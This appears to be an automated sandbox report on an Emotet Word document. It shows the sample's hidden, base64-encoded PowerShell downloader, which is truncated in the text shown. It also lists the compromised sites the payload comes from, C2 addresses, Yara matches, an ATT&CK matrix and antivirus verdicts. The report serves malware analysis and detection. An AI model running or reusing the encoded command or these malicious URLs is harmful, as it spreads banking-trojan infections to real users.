BuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000E.00000002.2340258197.0000000000740000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2340368896.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2114550082.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2102026803.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103817256.0000000000770000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2112160359.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2106310017.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099609589.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2113942317.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2106250328.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103543445.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2112213482.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099871520.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103566665.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099349373.0000000000240000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2110427728.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2102360231.0000000000990000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2110654197.0000000000750000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2111292152.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2101833824.0000000000230000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2340125586.0000000000300000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2110403391.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2112133272.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.750000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.b10000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.990000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.7b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.770000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.b10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.7b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.750000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.990000.1.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Masquerading21OS Credential DumpingSecurity Software Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScripting12Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol112Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonScripting12Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344852 Sample: ARCH_25_012021.doc Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 48 1.226.84.243:8080 unknown unknown 2->48 50 104.130.154.83:7080 unknown unknown 2->50 52 91 other IPs or domains 2->52 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Multi AV Scanner detection for domain / URL 2->58 60 Found malware configuration 2->60 62 16 other signatures 2->62 15 cmd.exe 2->15         started        18 WINWORD.EXE 293 30 2->18         started        signatures3 process4 signatures5 70 Suspicious powershell command line found 15->70 72 Very long command line found 15->72 74 Encrypted powershell cmdline option found 15->74 20 powershell.exe 12 9 15->20         started        25 msg.exe 15->25         started        process6 dnsIp7 54 shannared.com 192.169.223.13, 49167, 80 AS-26496-GO-DADDY-COM-LLCUS United States 20->54 46 C:\Users\user\Kaktksw\An6othh4649I.dll, PE32 20->46 dropped 66 Powershell drops PE file 20->66 27 rundll32.exe 20->27         started        file8 signatures9 process10 process11 29 rundll32.exe 27->29         started        process12 31 rundll32.exe 2 29->31         started        signatures13 76 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->76 34 rundll32.exe 31->34         started        process14 process15 36 rundll32.exe 1 34->36         started        signatures16 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 36->64 39 rundll32.exe 36->39         started        process17 process18 41 rundll32.exe 1 39->41         started        signatures19 68 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->68 44 rundll32.exe 41->44         started        process20

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      ARCH_25_012021.doc57%VirustotalBrowse
                      ARCH_25_012021.doc26%ReversingLabsDocument-Word.Trojan.GenScript

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Kaktksw\An6othh\N49I.dll100%Joe Sandbox ML
                      C:\Users\user\Kaktksw\An6othh\N49I.dll82%ReversingLabsWin32.Trojan.EmotetCrypt

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      14.2.rundll32.exe.740000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.2b0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.b10000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.710000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.240000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.770000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.230000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.750000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.2e0000.1.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      shannared.com5%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://3musketeersent.net/wp-includes/TUgD/8%VirustotalBrowse
                      http://3musketeersent.net/wp-includes/TUgD/100%Avira URL Cloudmalware
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      https://skilmu.com/wp-admin/hQVlB8b/11%VirustotalBrowse
                      https://skilmu.com/wp-admin/hQVlB8b/0%Avira URL Cloudsafe
                      http://jeevanlic.com/wp-content/r8M/0%Avira URL Cloudsafe
                      http://dashudance.com/thinkphp/dgs7Jm9/100%Avira URL Cloudmalware
                      http://shannared.com0%Avira URL Cloudsafe
                      http://shannared.com/content/lhALeS/100%Avira URL Cloudmalware
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/100%Avira URL Cloudmalware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://leopardcranes.com/zynq-linux-yaayf/w/100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      shannared.com
                      		192.169.223.13
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://shannared.com/content/lhALeS/true
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpfalse
                        		high
                        http://www.windows.com/pctv.rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpfalse
                          		high
                          http://investor.msn.comrundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpfalse
                              		high
                              http://3musketeersent.net/wp-includes/TUgD/powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmptrue
                              • 8%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2098057868.00000000022D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103421581.0000000002980000.00000002.00000001.sdmpfalse
                                		high
                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpfalse
                                  		high
                                  https://skilmu.com/wp-admin/hQVlB8b/powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmptrue
                                  • 11%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://jeevanlic.com/wp-content/r8M/powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://dashudance.com/thinkphp/dgs7Jm9/powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://shannared.compowershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://investor.msn.com/rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpfalse
                                      		high
                                      http://www.%s.comPApowershell.exe, 00000005.00000002.2098057868.00000000022D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103421581.0000000002980000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		low
                                      http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpfalse
                                        		high
                                        http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.piriform.com/powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpfalse
                                            		high
                                            http://leopardcranes.com/zynq-linux-yaayf/w/powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            200.75.39.254:80
                                            		unknownunknown
